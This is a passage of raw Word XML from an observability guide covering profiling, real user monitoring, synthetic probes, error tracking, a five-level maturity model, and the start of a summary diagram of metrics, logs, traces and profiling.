        <w:t xml:space="preserve"> 10%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEECB05" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="32EF30DF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Without profiling: "Service is slow" (which code path?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D329B61" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>With profiling: "60% of CPU time is in queryDatabase() → optimize that query"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397F8CD7" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.2 Real User Monitoring (RUM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4ADB36" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC88EEA" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>What: Measuring actual user experience from their browser/device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081FA138" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Why: Server-side metrics miss client-side issues (slow rendering, JS errors, network).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40789EB6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="6E6D7CE3" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Signals:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795D0952" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Core Web Vitals (LCP, FID/INP, CLS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013B8E8C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Page load time breakdown (DNS, TCP, TLS, TTFB, download, render)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D838CB" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - JavaScript errors (with stack traces)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5607BCD5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - User interactions (clicks, navigations, rage clicks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E40AB4" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Geographic performance distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247B4E45" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="29766D5C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4E270E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Browser JS snippet → captures performance events → sends to RUM backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343D2C9D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  RUM backend correlates with server-side traces (via trace_id in page response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E5456C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.3 Synthetic Monitoring (Probes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA51786" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678460F8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>What: Automated checks that simulate user behavior from external locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C88FC82" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Why: Detect issues before real users report them. Monitor from user's perspective.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4BEF15" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="121FA2AB" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B029C6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  HTTP checks: GET /health → expect 200 (every 30s from 10 global locations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3F7EDA" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Browser tests: Load page, click button, verify element appears (Playwright/Puppeteer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF23694" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  API tests: Full API workflow (create user → login → place order → verify)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0024AD40" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  TCP/DNS checks: Verify connectivity at network level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A172FDE" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="0694134C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Tools: Grafana Synthetic Monitoring, Datadog Synthetics, Pingdom, Checkly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B4FC91" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="2F4A2E49" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Advantage: Catches issues even when no real traffic is flowing (3 AM, weekends).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDE69E1" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.4 Error Tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E90C1E5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026B29EA" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>What: Capturing, deduplicating, and tracking application errors/exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6433A091" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Why: Logs show individual errors. Error tracking shows TRENDS and IMPACT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA3BB1D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="434E093F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Tools: Sentry, Bugsnag, Rollbar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C59B31" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="6EDF7074" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>What error tracking provides beyond logs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEA0130" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Deduplication: "This error occurred 50,000 times across 2,000 users"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083C4969" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Regression detection: "This error started with deploy v2.3.1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD8F2C0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Stack trace grouping: Variants of the same error grouped together</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE56CAB" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - User impact: "Affecting 5% of users in region EU"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2886A973" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Release tracking: Error count per release version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511F65A3" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Source maps: Minified JS errors → original source location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8AF548" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:pict w14:anchorId="78DFCD4A">
          <v:rect id="_x0000_i6141" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F0A78B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. Observability Maturity Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605857E9" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38316C5F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Level 0: Flying blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B175379" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - No metrics, no centralized logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EA366E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - "Users report problems on Twitter"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C36DBE6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - SSH into servers and grep log files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9EDA67" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="2C2D5EB6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Level 1: Basic monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639735EB" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Infrastructure metrics (CPU, memory, disk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFC755A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Basic uptime checks (is the site up?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022ED6A4" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Unstructured logs in a centralized system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ECF5FE" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Simple threshold alerts ("CPU &gt; 90%")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A5F5C0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="63D1CDD8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Level 2: Service monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D2C47E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Application-level metrics (RED: Rate, Errors, Duration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC8D443" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Structured logging with context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3583FAEA" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Basic distributed tracing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233DB50E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Dashboards per service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1157AFF5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - On-call rotation with alert routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C06039F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="3DC5DEC0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Level 3: Observable systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFF4C7B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - SLOs defined for all critical paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F25F7A1" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Error budget-based alerting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E99B986" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Full distributed tracing with correlation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6F21F1" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Automated canary deployments with observability gates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147619B5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Sub-5-minute time-to-detection for all incidents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C4F1AC" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="4B7820CF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Level 4: Predictive and automated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8F906C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Anomaly detection (ML-based baseline deviations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A4564D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Automated remediation (auto-scale, auto-rollback)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8FA45C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Chaos engineering integrated with observability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A135D6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Business metrics correlated with technical metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239B3979" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Observability-driven development (instrument before ship)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F88B8F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:pict w14:anchorId="3CD38991">
          <v:rect id="_x0000_i6142" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0EB40F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13. Summary — The Complete Mental Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351E6563" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A245ACF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>┌─────────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBC9ADB" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                      OBSERVABILITY SYSTEM                             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518D8D5D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                                                                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E74FF67" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  ┌──────────┐     ┌──────────┐     ┌──────────┐     ┌──────────┐  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2976EB5C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  │  Metrics │     │   Logs   │     │  Traces  │     │Profiling │  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522FF333" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  │ (What's  │     │ (What    │     │ (How does│     │(Where is │  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1491D002" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  │happening │     │ happened │     │ a request│     │ CPU time │  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E5A675" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  │  now?)   │     │  exactly)│     │ flow?)   │     │  spent?) │  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2FA627" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  └────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────┘</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>└────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────┘</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>└────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────┘</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>└────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
